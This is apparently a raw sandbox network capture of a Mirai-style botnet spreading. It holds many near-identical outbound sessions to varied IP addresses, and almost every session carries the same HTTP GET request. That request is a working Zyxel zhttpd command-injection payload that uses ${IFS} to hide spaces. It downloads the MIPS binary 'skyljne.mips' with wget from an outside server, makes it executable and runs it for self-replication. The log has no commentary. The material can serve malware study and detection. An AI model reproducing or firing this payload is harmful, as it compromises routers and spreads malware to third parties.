                                        Jan 14, 2024 16:18:37.277285099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2227192.168.2.1347502209.75.110.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277369022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2228192.168.2.13431949.25.220.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277411938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2229192.168.2.1355910155.85.161.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277481079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2230192.168.2.1350716196.241.126.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277540922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2231192.168.2.134176246.199.15.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277631998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2232192.168.2.1352296222.209.16.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277642965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2233192.168.2.133279493.164.57.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277703047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2234192.168.2.1339202105.116.99.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277760983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2235192.168.2.1344480122.214.178.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277852058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2236192.168.2.1356600217.117.191.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.277934074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2237192.168.2.1359606138.170.7.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278011084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2238192.168.2.1353716216.109.195.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278058052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2239192.168.2.1333984165.159.91.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278125048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2240192.168.2.1333712182.248.112.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278198957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2241192.168.2.1347130197.251.60.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278250933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2242192.168.2.133398675.36.240.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278296947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2243192.168.2.1358656220.125.155.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278357029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2244192.168.2.1353122136.100.161.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278398991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2245192.168.2.1350266222.239.94.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278435946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2246192.168.2.1339492182.221.30.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278505087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2247192.168.2.133883012.119.32.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278574944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2248192.168.2.1351892104.227.80.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278626919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2249192.168.2.1359720101.71.74.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278698921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2250192.168.2.1346936189.130.1.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278760910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2251192.168.2.1350698216.177.50.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278815031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2252192.168.2.134676669.62.134.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278855085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2253192.168.2.135871858.166.111.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278949022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2254192.168.2.1348472113.107.156.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.278985023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2255192.168.2.1349674129.55.61.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279045105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2256192.168.2.1358318186.163.196.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279134989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2257192.168.2.1360988183.55.168.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279145002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2258192.168.2.1345656202.42.43.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279206991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2259192.168.2.1334666190.30.48.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279263973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2260192.168.2.1356140147.107.39.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279350996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2261192.168.2.134758295.87.181.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279417992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2262192.168.2.134280481.107.100.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279465914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2263192.168.2.135543678.118.45.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279505014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2264192.168.2.1337232104.214.31.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279553890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2265192.168.2.1351288185.24.9.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279617071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2266192.168.2.1349268109.181.130.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279655933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2267192.168.2.13451008.239.240.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279723883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2268192.168.2.1350330160.215.137.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279771090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2269192.168.2.1340792206.157.148.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279840946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2270192.168.2.1343438198.138.27.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279903889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2271192.168.2.133685640.130.23.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.279966116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2272192.168.2.1341726166.212.199.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280005932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2273192.168.2.1347928120.102.52.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280046940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2274192.168.2.135411694.182.8.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280100107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2275192.168.2.1346568107.79.65.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280155897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2276192.168.2.135860270.179.215.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280211926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2277192.168.2.1352450119.14.16.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280297041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2278192.168.2.135034237.32.28.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280359030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2279192.168.2.135017887.250.99.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280399084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2280192.168.2.1335262131.50.28.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280459881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2281192.168.2.135176045.78.67.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280549049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2282192.168.2.1337348205.236.159.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280605078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2283192.168.2.1333678131.192.172.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280690908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2284192.168.2.134273013.222.220.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280741930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2285192.168.2.1358652162.198.123.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280807018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2286192.168.2.1342184150.138.37.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280839920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2287192.168.2.1341774108.238.71.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.280952930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2288192.168.2.134375687.78.254.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281002045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2289192.168.2.1358046223.32.83.206443
                                        TimestampBytes transferredDirectionData
